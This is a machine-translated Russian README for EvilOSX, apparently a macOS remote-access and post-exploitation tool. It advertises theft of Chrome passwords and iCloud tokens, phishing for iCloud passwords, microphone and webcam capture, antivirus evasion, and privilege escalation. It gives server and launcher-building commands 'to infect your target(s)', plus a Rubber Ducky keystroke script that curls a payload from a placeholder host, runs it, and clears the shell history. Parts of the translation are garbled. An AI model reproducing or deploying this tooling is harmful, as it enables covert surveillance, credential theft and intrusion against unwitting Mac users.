EvilOSX

Marco Generator от Cedric Owens

• Эмулировать экземпляр терминала
• Простая система модуля расширяется
• Нет зависимости от бота (Pure Python)
• Не обнаруживается антивирусом (OpenSSL AES-256 зашифрованные полезные нагрузки)
• Настойчивый
• Поддержка GUI и CLI
• Получить хромированные пароли
• Получить токены и контакты iCloud
• Получить/контролировать буфер обмена
• Получить историю браузеров (Chrome и Safari)
• Phish для паролей iCloud через iTunes
• iTunes (iOS) резервное копирование
• Запишите микрофон
• Сделайте настольный скриншот или изображение, используя веб -камеру
• Попытка получить корень через эскалацию локальной привилегии

 # Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

ПРЕДУПРЕЖДЕНИЕ: Поскольку полезные нагрузки создаются уникальными для целевой системы (автоматически сервером), сервер должен работать, когда любой бот подключается в первый раз.

Есть также CLI для тех, кто хочет использовать это над SSH:

 # Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s) 

Этот проект был создан для использования с моим резиновым Ducky, вот простой сценарий:

 REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

• Это займет около 10 секунд, чтобы заполучить любой разблокированный Mac, который ... хороший
• Termina L написано таким образом намеренно, в некоторых системах Spotlight не найдет терминал иначе.
  
• Чтобы обойти помощника по настройке клавиатуры, убедитесь, что вы изменили VID и PID, которые можно найти здесь.
  Алюминиевая клавиатура (ISO), вероятно, вы ищете.

EvilOSX будет храниться в соответствии с руководящими принципами семантической версии.
Серверные и ботские выпуски будут пронумерованы с помощью формата следующего:

 <major>.<minor>.<patch>

И построено со следующими рекомендациями:

• Порыв обратной совместимости (со старыми ботами) усиливает основной
• Новые дополнения, не сломавшись назад
• Исправления ошибок и изменения MISC.

Для получения дополнительной информации о Semver, пожалуйста, посетите https://semver.org/.

• Заражение машины разделено на три части:
  • Запуск запускается на целевой машине, единственная цель, запустив Stager.
  • Стагер спрашивает сервер для загрузчика , который обрабатывает, как будет загружена полезная нагрузка
  • Погрузчику дают уникальную зашифрованную полезную нагрузку , а затем отправляются обратно на стагер
• Сервер скрывает свои сообщения, отправляя сообщения, скрытые на страницах ошибок HTTP 404 (от «Блэкхата" прятась на явной зрения ")
  • Запросы команд получены с сервера через запрос GET
  • Ответы команд отправляются на сервер через запрос POST
• Модули пользуются динамическим характером Python, они просто отправляются через сеть, сжатую с помощью Zlib, вместе с любыми параметрами конфигурации
• Поскольку бот общается только с сервером и никогда не наоборот, сервер не может узнать, когда бот выйдет в автономном режиме

Не стесняйтесь отправлять здесь любые вопросы или запросы на функции.

Для простого руководства о том, как создавать модули, нажмите здесь.

• Awesome Empire Project
• Выкрикивай Патрик Уордл за его потрясающими беседами, посмотрите на объективную-см.
• Manwhoami для его проектов: Osxchromedecrypt, Mmetokendecrypt, iCloudContacts
  (Теперь удален ... дайте мне знать, если вы снова появитесь)
• Модуль Slowloris в значительной степени скопирован из Pylowloris
• Урвид и этот код, который сэкономил мне много времени с CLI
• Логотип, созданный Motusora

GPLV3